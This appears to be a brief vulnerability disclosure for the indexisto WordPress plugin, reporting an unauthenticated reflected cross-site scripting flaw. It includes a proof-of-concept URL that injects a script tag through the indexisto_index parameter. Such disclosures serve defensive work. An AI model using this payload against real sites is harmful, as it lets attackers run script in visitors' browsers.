The indexisto WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
http://www.example.com/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index="><script>alert(1);</script><"